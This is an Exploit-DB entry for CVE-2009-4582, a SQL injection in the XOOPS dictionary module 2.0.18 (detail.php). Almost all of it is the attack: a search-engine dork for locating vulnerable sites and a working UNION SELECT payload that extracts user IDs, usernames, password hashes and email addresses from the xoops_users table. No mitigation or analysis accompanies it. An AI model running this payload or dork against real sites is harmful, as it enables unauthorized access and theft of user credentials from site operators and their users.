XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability



EDB-ID: 10807 CVE: 2009-4582 OSVDB-ID: 61564
Author: Palyo34 Published: 2009-12-30 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
##########################################
#
#  XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
#
#  XOOPS Version:  XOOPS 2.0.18 
#
#  http://www.xoops.org/modules/repository/
#
##########################################
#
# AUTHOR : Palyo34
#
# HOME : http://www.1923turk.biz
#
#
###########################################
#
# DORK  : allinurl: "modules/dictionary/detail.php?id"
#
###########################################
#   
#   EXPLOIT :
#
#     modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pass,email),5,6+from+xoops_users--
#
##############################################